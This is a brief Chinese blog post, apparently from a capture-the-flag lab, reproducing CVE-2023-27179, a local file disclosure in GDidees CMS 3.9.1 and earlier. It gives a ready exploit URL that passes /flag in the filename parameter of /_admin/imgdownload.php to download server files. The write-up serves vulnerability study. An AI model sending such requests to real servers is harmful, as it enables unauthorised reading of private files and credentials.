CVE-2023-27179 复现

题目描述:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞，漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

实际攻击:开启容器后访问url如下
https://eci-2ze5gnqeym8bbt48nwsv.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=/flag
然后就能够直接下载这个文件的扩展名为png的形式.后端代码就不去分析了,干了啥基本也能猜到...

posted @ 2024-08-03 22:48 colorfullbz 阅读(193) 评论(0) 收藏举报

刷新页面返回顶部

meraklbz

CVE-2023-27179 复现

公告